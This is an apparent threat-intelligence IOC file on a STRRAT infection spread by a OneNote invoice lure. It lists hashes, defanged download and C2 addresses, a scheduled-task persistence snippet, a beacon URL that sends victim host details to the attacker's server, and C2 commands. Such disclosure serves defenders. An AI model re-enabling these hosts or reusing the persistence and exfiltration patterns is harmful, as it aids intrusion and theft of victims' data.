2023-04-05-IOCs-for-STRRAT-activity.txt

2023-04-05 (WEDNESDAY): ONENOTE FILE DISTRIBUTES STRRAT MALWARE, INFECTION LEADS TO RDP ACTIVITY

REFERENCE:

- https://twitter.com/Unit42_Intel/status/1644062757891854344

NOTES:

- This malicious OneNote file was likely sent via email, but we cannot yet confirm.
- In this infection, someone searched through the victim's documents folder using Remote Desktop Protocol (RDP) over STRRAT C2 traffic.
- We could see the attacker opening and checking files from the victim's desktop.

INFECTION CHAIN:

- OneNote file --> embedded .vbe file --> traffic for .jar --> STRRAT .jar --> STRRAT C2 with RDP

ONENOTE FILE:

- SHA256 hash: 0008069a7d4f9e1539473085c723edd7c647dc7982ae536a3ee7de2bfc24471e
- File size: 7,820,392 bytes
- File name: Invoice-#GD59840.one
- File description: Example of malicious OneNote file with embedded VB script

EMBEDDED VBE FILE:

- SHA256 hash: d22c86bd4512b14e3d0e8cd5a78911795461f3f793c7b18dd1a31362eb7e7837
- File size: 509,306 bytes
- File name: ..vbe
- File description: embedded VB executable script in above OneNote file

TRAFFIC GENERATED BY ABOVE VBE FILE:

- For Java Runtime Environment (JRE) if victim doesn't have it: hxxps://www.paradisodomenico[.]it/Oracle/Oracle_64.zip
- For Java Archive (.jar) file: hxxps://www.paradisodomenico[.]it/Oracle/auz.zip

ZIP ARCHIVE CONTAINING STRRAT JAR FILE:

- SHA256 hash: b69b56937410a11e071ff03e8cc329345e9ca0c06a3445da35a66045b70cde7c
- File size: 181,078 bytes
- File location: hxxps://www.paradisodomenico[.]it/Oracle/auz.zip
- File location: C:\Users\[username]\AppData\Local\Temp\[random characters]\[random characters].zip
- File description: Retrieved by VBE file, zip archive containing .jar file for STRRAT

STRRAT JAR FILE:

- SHA256 hash: b69b56937410a11e071ff03e8cc329345e9ca0c06a3445da35a66045b70cde7c
- File size: 181,078 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\[random characters]\azupdate\auz.jar
- File location: C:\Users\[username]\AppData\Roaming\[random hex characters]\[random hex characters].log
- File description: Java archive (.jar) file extracted from the above .zip archive

EXAMPLE OF SCHEDULED TASK RUN METHOD FOR PERSISTENCE:

    <Exec>
      <Command>"C:\Users\user1\AppData\Roaming\java\bin\javaw.exe"</Command>
      <Arguments>-jar "C:\Users\user1\AppData\Roaming\be5af5\be5af53d095c76592c78c5d2eb0519e0.log"</Arguments>
    </Exec>

ADDITIONAL FILE FOUND ON THE INFECTED WINDOWS HOST:

- SHA256 hash: 4185c0885eb84c0a4d04ec757fdcc1220729ba8733013e0a93f1f31da5c565f9
- File size: 2,042,368 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\[random characters]\[random characters]
- File description: 32-bit Windows EXE file
- Note 1: This is in a different directory than the zip-ed .jar file was originally saved to.
- Note 2: Not sure what this file is used for, or if it came from HTTPS traffic to www.paradisodomenico.it like the .jar file.

TRAFFIC GENERATED BY STRRAT JAR FILE:

- DNS queries for adrenalinecyber[.]com (response: No such name)

- For location of victim: hxxps://www.geoplugin[.]net/json.gp?ip=

- Sending victim info (User-Agent: Java/1.8.0_271): hzzps://www.paradisodomenico[.]it/wp-content//api.php?action=get_anytask&ip=&
  computer_name=DESKTOP-USER1PC&user_name=user1&mac=01-23-45-67-89-AB&country_code=us&is_admin=normal&Def=ON&
  hwid=0123456789abcdef0123456789abcdef

- This infection generated periodic attempts to contact adrenalinecyber[.]com and HTTPS traffic to www.paradisodomenico[.]it, 
  repeating every few minutes.

STRRAT TRAFFIC:

- 185.91.69[.]172 port 1234 - checkmybones.dns[.]army - TCP traffic

NOTE: Text-based command strings seen from the STRRAT C2 server at 185.91.69[.]172:1234 inlcude:

HASPLUGIN
HEARTBEAT~
HEARTBEAT~
REMOTEDESKTOP
QUITREMOTEDESKTOP
HEARTBEAT~
REMOTEDESKTOP
RDPCLICK~18~1059
RDPCLICK~414~1058
RDPCLICK~722~572
RDPCLICK~917~625
RDPCLICK~917~625
HEARTBEAT~